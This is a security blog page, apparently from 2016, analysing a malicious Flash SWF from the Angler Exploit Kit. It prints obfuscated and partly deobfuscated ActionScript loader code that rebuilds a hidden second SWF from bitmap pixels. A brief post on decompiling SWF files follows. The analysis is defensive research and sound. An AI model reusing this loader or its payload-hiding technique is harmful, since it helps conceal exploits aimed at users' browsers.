I made an attempt to deofuscated and analyze a malicious Adobe Flash SWF file from Malware Traffic Analysis blog about the Angler Exploit kit. I ran through the steps I mentioned to export from the PCAP and turn the SWF file into ActionScript code.
I ended up with this ugly obfuscated mess of ActionScript code. Below is just a sampling, but here is the full obfuscated ActionScript code.
var _local1:* = new ((this.1[IlllI.11IIlI1lIl](IlllI.I11lI1IlI1) as Class))();
var _local2:* = new this.ll1IlI1II1lI()[IlllI.1lIlI1lI];
var _local3:int = _local2[IlllI.1lIIlI1lI1];
var _local4:int = _local2[IlllI.Ill1lI1];
var _local5:uint;
var _local6:uint = (10 - (5 * 2));
var _local7:int;
while (_local7 < _local3) {
_local8 = 0;
while (_local8 < _local4) {
_local9 = _local2[IlllI.11lIlI](_local7, _local8);
if ((((_local7 == 0)) && ((_local8 == 0)))){
_local5 = (_local9 & 0xFFFFFF);
}
I thought I'd take a stab at de-obfuscating this code, and I was decently successful with unraveling the first layer of obfuscation I thought. I pasted partial deobfuscated code here and thought I'd review some of it below. I deobfuscated it by renaming variables and functionings, removing unnecessary variable declarations and string concatenations, removing unnecessary nested function calls, etc.
public class Document extends MovieClip {
public function Document(){
super();
if (this["stage"]){
this.functionStartExploit();
} else {
this["addEventListener"]("addedToStage", this.functionStartExploit);
};
}
Per the above code, when the SWF file loads in the user's browser, it does the standard start for a flash file. It basically waits for the stage (the main area of the SWF) to load, and if it's not loaded yet it adds a listener which will trigger an event as soon as the stage has loaded. Once it's loaded the attacker starts the exploit.
public function functionStartExploit():void{
this["removeEventListener"]("addedToStage", this.functionStartExploit);
var _localEmbeddedSWF:* = new flash.display.Loader();
_localEmbeddedSWF["loadBytes"](this.functionEmbeddedSWFFromBitmap());
this["addChild"](_localEmbeddedSWF);
}
First the attacker removes the stage listener since it's already loaded now. Then the attacker creates a place holder for a nested SWF file (yes there is essentially a SWF within a SWF). There was an initial layer of obfuscation that involved all the renaming of variables, creating unnecessary string concatenations, etc. But there is a secondary layer of obfuscation that is occurring by loading an embedded SWF file inside this one. So the actual exploit isn't occurring in this SWF that I'm analyzing but in a nested one that appears to have been hidden in a Bitmap file as you'll see below. Once that embedded SWF is loaded, then it's added as a child to this SWF file so that it will load also.
private function functionEmbeddedSWFFromBitmap(){
var _localMaliciousByteArray:* = new flash.utils.ByteArray();
var _localBitmap:* = new BitmapAsset()["bitmapData"];
...
while (_localCounter2 < _localBitmap["width"]) {
while (_localCounterNested < _localBitmap["height"]) {
_localPixel = _localBitmap["getPixel"](_localCounter2, _localCounterNested);
...
_localMaliciousByteArray["writeByte"]((_localPixel & 0xFF));
_localMaliciousByteArray["writeByte"](((_localPixel >> 8) & 0xFF));
_localMaliciousByteArray["writeByte"](((_localPixel >> 16) & 0xFF));
...
_localCounterNested++;
};
...
_localCounter2++;
};
...
_localMaliciousByteArray["position"] = 0;
return (_localMaliciousByteArray);
}
Finally above when loading that embedded SWF from a BitMap file there is some additional altering or messing with the bytes before it's returned back and loaded into that nested location.
I found it interesting to see this nested obfuscation technique in action and it definitely makes it harder to analyze as a security researcher because the exploit you're looking for doesn't even actually exist in this SWF file that we spotted.
More about neonprimetime
Top Blogs of all-time
Top Github Contributions
Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Showing posts with label SWF. Show all posts
Showing posts with label SWF. Show all posts
Thursday, June 2, 2016
Decompile a Adobe Flash SWF File
If you were analyzing a malicious Adobe Flash SWF file, such as the ones mentioned in Brad's Malware Traffic Analysis blog about the Angler Exploit kit, you might be wondering what's actually a good way to analysis that SWF since it's already compiled and unreadable. Well, remember first if you have a PCAP with a SWF file in it, per a previous blog, you need to Export HTTP Object. Now that you have the SWF file it's actually quite easy to decompile and get some Adobe ActionScript code to review. You could use any free online decompiler like showmycode.com to upload the SWF file and it'll spit out immediately for you some ActionScript.
More about neonprimetime
Top Blogs of all-time
Top Github Contributions
Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.
More about neonprimetime
Top Blogs of all-time
Top Github Contributions
Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Subscribe to:
Posts (Atom)